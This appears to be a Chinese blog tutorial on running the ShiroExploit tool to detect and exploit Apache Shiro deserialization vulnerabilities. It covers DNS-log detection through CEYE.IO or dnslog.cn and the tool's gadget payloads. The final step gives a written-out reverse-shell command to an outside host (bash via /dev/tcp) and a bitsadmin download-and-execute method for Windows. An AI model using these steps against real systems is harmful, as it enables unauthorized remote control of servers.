文章目录
01 下载ShiroExploit.V2.3,并运行.jar02 运行后的界面03输入测试的url04 选择检测方式05 判断是否存在漏洞的依据06 反弹shell
01 下载ShiroExploit.V2.3,并运行.jar
在github上直接搜索下载有源码,可以自己编译成.jar
02 运行后的界面
Shiro550无需选择操作系统类型,Shiro721需要选择操作系统类型复杂Http请求支持直接粘贴数据包
03输入测试的url
可以自己直接输入被检测是否存在shire反序列漏洞的地址
04 选择检测方式
CEYE.IO
可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload
dnslog.cn
可以不进行任何配置,每次启动时程序会自动从 dnslog.cn 申请一个 DNS Record。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload
缺点:少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget,且 dnslog.cn 只会记录最近的10条 DNS 解析记录
05 判断是否存在漏洞的依据
程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入。当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令。
06 反弹shell
反弹shell(linux)采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1的方式反弹 shell反弹shell(Windows)采用 bitsadmin下载指定 URL 的 exe 文件并执行的方式获取 shell如果反弹shell无法成功,可能自己的阿里云主机的端口未开放
参考链接:https://github.com/feihong-cs/ShiroExploit